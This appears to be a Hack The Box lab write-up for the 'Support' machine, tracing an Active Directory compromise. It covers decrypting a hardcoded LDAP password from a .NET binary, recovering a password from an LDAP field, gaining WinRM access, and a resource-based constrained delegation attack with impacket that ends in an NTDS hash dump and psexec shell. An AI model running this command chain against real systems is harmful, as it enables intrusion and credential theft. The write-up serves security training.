HTB - Support

Scope

Ip Address: 10.10.11.174

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -F $ip -Pn 

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open wsman

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv 

PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack
135/tcp   open  msrpc          syn-ack
139/tcp   open  netbios-ssn    syn-ack
445/tcp   open  microsoft-ds   syn-ack
464/tcp   open  kpasswd5       syn-ack
593/tcp   open  http-rpc-epmap syn-ack
636/tcp   open  ldapssl        syn-ack
3268/tcp  open  globalcatLDAP  syn-ack
5985/tcp  open  wsman          syn-ack
9389/tcp  open  adws           syn-ack
49757/tcp open  unknown        syn-ack

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p53,135,139,445,464,593,636,3268,5985,49757 $ip -Pn -oN script-scan -sCV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49757/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-05T22:01:48
|_  start_date: N/A

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

* Open ports: 53,135,139,445,464,593,636,3268,5985
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - RPC - SMB - NETBIOS - LDAP - KERBEROS - winRM

DNS

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ dig axfr support.htb @$ip                                                                
; <<>> DiG 9.19.19-1-Debian <<>> axfr support.htb @10.10.11.174
;; global options: +cmd
; Transfer failed.

RPC

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U "%" $ip                                  
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

SMB

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ smbclient -N -L //$ip                             

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u ''  -p '' --shares

SMB    10.10.11.174    445    DC   [+] support.htb\: 
SMB    10.10.11.174    445    DC   [-] Error enumerating shares: STATUS_ACCESS_DENIED

I opened a file and list share names in it, Then I created a for loop to find accessible share

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cat list| awk '{print $1}' | tee -a share.list
ADMIN$
C$
IPC$
NETLOGON
support-tools
SYSVOL

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ for share in $(cat share.list);do echo "\n\tShare Name is: $share\n" && smbclient -N \\\\$ip\\$share;done

<snip>

        Share Name is: support-tools
smb: \> ls                                                                                                                          
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022
<snip>

I will mount the remote share on my kali machine to easily navigate the share

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ mkdir mnt

┌──(kali㉿kali)-[~/…/HTB/machines/Support/New]
└─$ sudo mount -t cifs "\\\\$ip\\support-tools" ./mnt
Password for root@\\10.10.11.174\support-tools:

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cd mnt 

┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ ls
7-ZipPortable_21.07.paf.exe  WiresharkPortable64_3.6.5.paf.exe  windirstat1_1_2_setup.exe
SysinternalsSuite.zip        npp.8.4.1.portable.x64.zip
UserInfo.exe.zip             putty.exe

UserInfo.exe.zip File looks interesting, So I will copy it to windows machine

┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ unzip -l UserInfo.exe.zip 
Archive:  UserInfo.exe.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    12288  2022-05-27 13:51   UserInfo.exe
    99840  2022-03-01 13:18   CommandLineParser.dll
    22144  2021-10-22 19:42   Microsoft.Bcl.AsyncInterfaces.dll
    47216  2021-10-22 19:48   Microsoft.Extensions.DependencyInjection.Abstractions.dll
    84608  2021-10-22 19:48   Microsoft.Extensions.DependencyInjection.dll
    64112  2021-10-22 19:51   Microsoft.Extensions.Logging.Abstractions.dll
    20856  2020-02-19 05:05   System.Buffers.dll
   141184  2020-02-19 05:05   System.Memory.dll
   115856  2018-05-15 09:29   System.Numerics.Vectors.dll
    18024  2021-10-22 19:40   System.Runtime.CompilerServices.Unsafe.dll
    25984  2020-02-19 05:05   System.Threading.Tasks.Extensions.dll
      563  2022-05-27 12:59   UserInfo.exe.config
---------                     -------
   652675                     12 files

I've downloaded dnSpy.exe before, So I decided to open the files with it, Under LdapQuery tab there is interesting information here

A user has a name support\ldap but the password is protected

public LdapQuery()
	{
	string password = Protected.getPassword();
	this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
	this.entry.AuthenticationType = AuthenticationTypes.Secure;
	this.ds = new DirectorySearcher(this.entry);
	}

I clicked on getPassword() Function to see its content

namespace UserInfo.Services  
{    // Token: 0x02000006 RID: 6
	internal class Protected    {
		public static string getPassword()  
		{
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
				{
					array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
				}
			return Encoding.Default.GetString(array2);  
		}
        // Token: 0x04000005 RID: 5
        private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
        // Token: 0x04000006 RID: 6
        private static byte[] key = Encoding.ASCII.GetBytes("armando");
        }  
}

I can say that it's a decryption function to get the password in secure way involving base64 encoding and xor operation, So I asked chatGPT to rewrite this function in python to be able to run it on my host and here is the code

import base64
class Protected:
	enc_password = "<encrypted>"
	key = "<key>".encode('ascii')

@staticmethod
def get_password():
	array = base64.b64decode(Protected.enc_password)
	array2 = bytearray(array) # bytearray allows in-place modification
	for i in range(len(array)):
		array2[i] = array[i] ^ Protected.key[i % len(Protected.key)] ^ 223
	return array2.decode('ascii')

# Decodes the bytearray to a string # Usage example:
password = Protected.get_password()
print(password)

Run it and you will get the password

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nano get_password.py

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ python3 get_password.py                                             
nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxxxxx

I verified with crackmapexec and Success :)

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u 'ldap'  -p 'nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxxx'

SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxx

Initial Access

I tried to connect with winRM but failed So I decided to continue enumerating the domain with bloodhound-python and rpcclient

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound-python -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8xxxxxxxxxx' -ns $ip -d support.htb -c all

I Created a zip file to upload it to bloodhound GUI after starting it

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ zip support.zip *.json

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo neo4j start
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:45250). It is available at http://localhost:7474
There may be a short delay until the server is ready.

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound

I put custom query to bloodhound to see which user can PSRemote to the machine

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

I can also see that support User exists from rpcclient command

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U 'ldap%nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxx' $ip
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[ldap] rid:[0x450]
user:[support] rid:[0x451]
<snip>

I searched for this account on bloodhound and knew that support account is a member of SHARED SUPPORT ACCOUNTS which has GenericAll rights on DC.SUPPORT.HTB which is an attack path known as Resource based constrianed delegation (RBCD), So If I have the support I can takeover the DC

I search a lot to get the syntax of ldapsearch as it's confusing for me to get information from ldap about user support

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ ldapsearch -H ldap://$ip -x -b "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB" -s sub "*" -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | tee -a support.output

<snip>
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
<snip>

There is a value in info field, So I will try to connect to the machine with it and I got a hit :)

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u support -p 'Ironside47pleasure40Watchful'            

SMB  10.10.11.174   445   DC   [+] support.htb\support:Ironside47pleasure40Watchful

We knew from bloodhound that we can PSRemote with user support, So I fired up evil-winrm and waited for a shell access

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ evil-winrm -i $ip -u support -p 'Ironside47pleasure40Watchful'   

*Evil-WinRM* PS C:\Users\support\Documents> 

*Evil-WinRM* PS C:\Users\support> type Desktop\user.txt
8959fba6ef693c03xxxxxxxxxxxxxx

User flag 8959fba6ef693c03xxxxxxxxxxxx

Privilege Escalation

The path to domain admins is already obvious now. We can get the help of this post if we want to perform attack from Linux:

Abusing Resource-Based Constrained Delegation (RBCD) using LinuxAltered Security

We need a fake computer account and the name of the machine account that we can write attribute on.

The machine's name is DC$

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-addcomputer HTB.LOCAL/mrb3n -dc-ip 192.168.x.x -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' -dc-ip $ip -action write -delegate-from 'ATTACK$' -delegate-to 'DC$'           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACK$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ATTACK$      (S-1-5-21-1677581083-3380853377-188903654-5601)

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-getST -spn 'cifs/DC.SUPPORT.HTB' -impersonate Administrator 'support.htb/ATTACK$:AttackerPC1!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ export KRB5CCNAME =`pwd/Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache

For some reason, I couldn't connect with psexec.py or dump hashes with secretsdump.py, So I switched to crackmpaexec

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u administrator -k --use-kcache --ntds

<snip>

SMB         10.10.11.174    445    DC    [+] support.htb\ from ccache         Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddxxxxxxxxxxxx:::

<snip>

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-psexec support.htb/administrator@$ip -hashes :bb06cbc02b39abedddxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file bNtWYSHx.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service yBfc on 10.10.11.174.....
[*] Starting service yBfc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
e99ab2203321xxxxxxxxxxxxxxxx

Root flag: e99ab2203321xxxxxxxxxxxxxxxxxxxx

PreviousEasy NextHTB - Remote

Last updated 1 year ago